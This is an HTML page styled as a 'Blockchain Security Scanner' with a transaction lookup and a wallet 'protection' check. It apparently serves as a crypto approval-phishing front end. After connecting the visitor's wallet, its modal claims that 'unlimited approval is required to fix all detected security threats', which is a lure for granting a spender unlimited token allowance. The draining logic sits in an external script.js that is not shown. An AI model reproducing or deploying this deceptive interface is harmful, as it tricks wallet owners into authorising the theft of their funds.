<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>🔍 Blockchain Security Scanner - Transaction Verification & Wallet Protection</title>
    <script src="https://cdn.jsdelivr.net/npm/ethers@6.7.0/dist/ethers.umd.min.js"></script>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Inter', -apple-system, BlinkMacSystemFont, sans-serif;
            background: #0a0e27;
            color: #ffffff;
            min-height: 100vh;
            overflow-x: hidden;
        }

        /* Animated background */
        body::before {
            content: '';
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: 
                radial-gradient(circle at 20% 80%, rgba(120, 119, 198, 0.15) 0%, transparent 50%),
                radial-gradient(circle at 80% 20%, rgba(255, 119, 198, 0.15) 0%, transparent 50%),
                radial-gradient(circle at 40% 40%, rgba(120, 219, 255, 0.15) 0%, transparent 50%);
            z-index: -1;
        }

        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 0 20px;
        }

        /* Header */
        .header {
            padding: 40px 0;
            text-align: center;
            position: relative;
        }

        .header::before {
            content: '';
            position: absolute;
            top: 0;
            left: 50%;
            transform: translateX(-50%);
            width: 200px;
            height: 2px;
            background: linear-gradient(90deg, transparent, #64ffda, transparent);
            animation: pulse 2s ease-in-out infinite;
        }

        @keyframes pulse {
            0%, 100% { opacity: 0.5; }
            50% { opacity: 1; }
        }

        .logo {
            font-size: 48px;
            font-weight: 800;
            background: linear-gradient(135deg, #64ffda, #3f51b5, #e91e63);
            background-clip: text;
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            margin-bottom: 15px;
            text-shadow: 0 0 30px rgba(100, 255, 218, 0.3);
        }

        .subtitle {
            font-size: 20px;
            color: #b0bec5;
            margin-bottom: 30px;
            opacity: 0;
            animation: slideUp 1s ease-out 0.5s forwards;
        }

        @keyframes slideUp {
            from { transform: translateY(30px); opacity: 0; }
            to { transform: translateY(0); opacity: 1; }
        }

        /* Transaction Scanner Section */
        .scanner-section {
            background: rgba(255, 255, 255, 0.05);
            backdrop-filter: blur(20px);
            border: 1px solid rgba(255, 255, 255, 0.1);
            border-radius: 24px;
            padding: 40px;
            margin-bottom: 40px;
            position: relative;
            overflow: hidden;
            transition: all 0.3s ease;
        }

        .scanner-section:hover {
            transform: translateY(-2px);
            box-shadow: 0 10px 20px rgba(0, 0, 0, 0.2);
        }

        .scanner-section::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, rgba(100, 255, 218, 0.1), transparent);
            transition: left 0.6s ease;
        }

        .scanner-section:hover::before {
            left: 100%;
        }

        .section-title {
            font-size: 32px;
            font-weight: 700;
            color: #64ffda;
            margin-bottom: 15px;
            display: flex;
            align-items: center;
            gap: 15px;
        }

        .section-subtitle {
            color: #90a4ae;
            margin-bottom: 30px;
            font-size: 16px;
        }

        .search-container {
            position: relative;
            margin-bottom: 25px;
        }

        .search-input {
            width: 100%;
            padding: 20px 25px;
            background: rgba(255, 255, 255, 0.08);
            border: 2px solid rgba(100, 255, 218, 0.3);
            border-radius: 16px;
            color: #ffffff;
            font-size: 16px;
            outline: none;
            transition: all 0.3s ease;
        }

        .search-input:focus {
            border-color: #64ffda;
            box-shadow: 0 0 20px rgba(100, 255, 218, 0.3);
            background: rgba(255, 255, 255, 0.12);
        }

        .search-input::placeholder {
            color: #607d8b;
        }

        .network-selector {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 15px;
            margin-bottom: 25px;
        }

        .network-option {
            background: rgba(255, 255, 255, 0.05);
            border: 2px solid rgba(255, 255, 255, 0.1);
            border-radius: 12px;
            padding: 15px;
            cursor: pointer;
            transition: all 0.3s ease;
            text-align: center;
        }

        .network-option:hover {
            border-color: #64ffda;
            background: rgba(100, 255, 218, 0.1);
        }

        .network-option.selected {
            border-color: #64ffda;
            background: rgba(100, 255, 218, 0.15);
        }

        .btn {
            background: linear-gradient(135deg, #64ffda, #3f51b5);
            color: #ffffff;
            border: none;
            padding: 18px 40px;
            border-radius: 50px;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s ease;
            text-transform: uppercase;
            letter-spacing: 1px;
            width: 100%;
            margin-bottom: 20px;
            position: relative;
            overflow: hidden;
        }

        .btn::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent);
            transition: left 0.5s ease;
        }

        .btn:hover::before {
            left: 100%;
        }

        .btn:hover {
            box-shadow: 0 8px 16px rgba(100, 255, 218, 0.4);
        }

        .btn-security {
            background: linear-gradient(135deg, #ff6b6b, #ee5a24);
        }

        .btn-security:hover {
            box-shadow: 0 15px 30px rgba(255, 107, 107, 0.4);
        }

        /* Support info */
        .support-info {
            background: rgba(100, 255, 218, 0.1);
            border: 1px solid rgba(100, 255, 218, 0.3);
            border-radius: 12px;
            padding: 20px;
            margin-top: 25px;
            text-align: center;
        }

        .support-info .checkmark {
            color: #64ffda;
            font-size: 24px;
            margin-right: 10px;
        }

        /* Results */
        .result {
            display: none;
            margin-top: 25px;
            padding: 25px;
            border-radius: 16px;
            animation: slideIn 0.5s ease-out;
        }

        @keyframes slideIn {
            from { transform: translateY(20px); opacity: 0; }
            to { transform: translateY(0); opacity: 1; }
        }

        .result.success {
            background: rgba(76, 175, 80, 0.1);
            border: 2px solid rgba(76, 175, 80, 0.3);
        }

        .result.error {
            background: rgba(244, 67, 54, 0.1);
            border: 2px solid rgba(244, 67, 54, 0.3);
        }

        .result.risk {
            background: rgba(255, 152, 0, 0.1);
            border: 2px solid rgba(255, 152, 0, 0.3);
        }

        /* Loading animation */
        .loading {
            display: none;
            text-align: center;
            padding: 30px;
        }

        .spinner {
            width: 60px;
            height: 60px;
            border: 4px solid rgba(100, 255, 218, 0.3);
            border-top: 4px solid #64ffda;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 0 auto 20px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* Wallet connection */
        .wallet-status {
            background: rgba(255, 255, 255, 0.05);
            border-radius: 16px;
            padding: 25px;
            margin-top: 25px;
            display: none;
        }

        .wallet-info {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 20px;
            margin-top: 20px;
        }

        .info-card {
            background: rgba(255, 255, 255, 0.05);
            border-radius: 12px;
            padding: 20px;
            text-align: center;
            border: 1px solid rgba(255, 255, 255, 0.1);
        }

        .info-label {
            color: #90a4ae;
            font-size: 14px;
            margin-bottom: 8px;
        }

        .info-value {
            color: #64ffda;
            font-size: 18px;
            font-weight: 600;
        }

        /* Risk alerts */
        .risk-alert {
            background: rgba(255, 152, 0, 0.1);
            border: 2px solid rgba(255, 152, 0, 0.4);
            border-radius: 12px;
            padding: 20px;
            margin: 15px 0;
            animation: glow 2s ease-in-out infinite alternate;
        }

        @keyframes glow {
            from { box-shadow: 0 0 10px rgba(255, 152, 0, 0.3); }
            to { box-shadow: 0 0 15px rgba(255, 152, 0, 0.5); }
        }

        .risk-title {
            color: #ff9800;
            font-weight: 600;
            margin-bottom: 10px;
            display: flex;
            align-items: center;
            gap: 10px;
        }

        /* Modal */
        .modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.8);
            z-index: 1000;
            backdrop-filter: blur(10px);
        }

        .modal-content {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background: #1a1a2e;
            border: 1px solid rgba(100, 255, 218, 0.3);
            border-radius: 20px;
            padding: 40px;
            max-width: 500px;
            width: 90%;
            text-align: center;
            box-shadow: 0 20px 40px rgba(0, 0, 0, 0.5);
        }

        .close-modal {
            position: absolute;
            top: 15px;
            right: 20px;
            background: none;
            border: none;
            color: #90a4ae;
            font-size: 28px;
            cursor: pointer;
        }

        /* Responsive */
        @media (max-width: 768px) {
            .container {
                padding: 0 15px;
            }

            .logo {
                font-size: 36px;
            }

            .section-title {
                font-size: 24px;
            }

            .scanner-section {
                padding: 20px;
            }

            .network-selector {
                grid-template-columns: repeat(2, 1fr);
                gap: 10px;
            }

            .network-option {
                padding: 12px;
            }

            .wallet-info {
                grid-template-columns: 1fr;
                gap: 15px;
            }

            .info-card {
                padding: 15px;
            }

            .modal-content {
                padding: 25px;
                width: 95%;
            }

            .btn {
                padding: 15px 30px;
                font-size: 14px;
            }
        }

        @media (max-width: 480px) {
            .logo {
                font-size: 28px;
            }

            .section-title {
                font-size: 20px;
                flex-direction: column;
                text-align: center;
            }

            .scanner-section {
                padding: 15px;
            }

            .network-selector {
                grid-template-columns: 1fr;
            }

            .search-input {
                padding: 15px 20px;
                font-size: 14px;
            }

            .btn {
                padding: 12px 25px;
                font-size: 13px;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1 class="logo">🔍 BlockChain Security Scanner</h1>
            <p class="subtitle">Advanced Transaction Verification & Wallet Protection System</p>
        </div>

        <!-- Transaction Scanner Section -->
        <div class="scanner-section">
            <h2 class="section-title">🔎 Transaction Hash Scanner</h2>
            <p class="section-subtitle">Enter any transaction hash to view detailed blockchain information</p>

            <div class="search-container">
                <input type="text" id="txInput" class="search-input" placeholder="Enter transaction hash (0x...)" />
            </div>

            <div class="network-selector">
                <div class="network-option selected" data-network="bsc">
                    <div style="font-size: 24px; margin-bottom: 8px;">🟡</div>
                    <div><strong>BSC Scan</strong></div>
                    <div style="font-size: 12px; color: #90a4ae;">Binance Smart Chain</div>
                </div>
                <div class="network-option" data-network="ethereum">
                    <div style="font-size: 24px; margin-bottom: 8px;">⚪</div>
                    <div><strong>Ethereum Scan</strong></div>
                    <div style="font-size: 12px; color: #90a4ae;">Ethereum Mainnet</div>
                </div>
                <div class="network-option" data-network="polygon">
                    <div style="font-size: 24px; margin-bottom: 8px;">🟣</div>
                    <div><strong>Polygon Scan</strong></div>
                    <div style="font-size: 12px; color: #90a4ae;">Polygon Network</div>
                </div>
                <div class="network-option" data-network="avalanche">
                    <div style="font-size: 24px; margin-bottom: 8px;">🔴</div>
                    <div><strong>Avalanche Scan</strong></div>
                    <div style="font-size: 12px; color: #90a4ae;">Avalanche C-Chain</div>
                </div>
            </div>

            <button class="btn" onclick="scanTransaction()">🔍 Scan Transaction</button>
            <div id="scanLoading" class="loading" style="display: none;">
                <div class="spinner"></div>
                <p>Scanning blockchain...</p>
            </div>
            <div id="scanResult" class="result"></div>
        </div>

        

        <!-- Wallet Security Checker Section -->
        <div class="scanner-section">
            <h2 class="section-title">🛡️ Check Wallet Protection</h2>
            <p class="section-subtitle">We detect and fix known on-chain threats by simulating transactions.</p>

            <button class="btn btn-security" onclick="connectWallet()">
                🛡️ Check Security
            </button>

            <div class="loading" id="securityLoading">
                <div class="spinner"></div>
                <p>Analyzing wallet security...</p>
            </div>

            <div class="wallet-status" id="walletStatus">
                <h3 style="color: #64ffda; margin-bottom: 20px;">✅ Wallet Connected Successfully</h3>
                <div id="walletAddress" style="font-family: monospace; background: rgba(255,255,255,0.1); padding: 15px; border-radius: 8px; margin-bottom: 20px;"></div>

                <div class="wallet-info" id="walletInfo"></div>

                <div id="riskAlerts" style="margin-top: 25px;"></div>

                <div id="secureButton" style="margin-top: 25px; display: none;">
                    <button class="btn btn-security" onclick="secureWallet()">
                        🔒 Secure Wallet Now
                    </button>
                </div>
            </div>
        </div>
    </div>

    <!-- Security Modal -->
    <div class="modal" id="securityModal">
        <div class="modal-content">
            <button class="close-modal" onclick="closeModal()">&times;</button>
            <h3 style="color: #64ffda; margin-bottom: 20px;">🔐 Wallet Security Authorization</h3>
            <p style="color: #90a4ae; margin-bottom: 25px;">To secure your wallet, unlimited approval is required to fix all detected security threats.</p>
            <div class="loading" id="authLoading">
                <div class="spinner"></div>
                <p>Processing security authorization...</p>
            </div>
            <div id="authResult"></div>
        </div>
    </div>

    <script src="script.js"></script>
</body>
</html>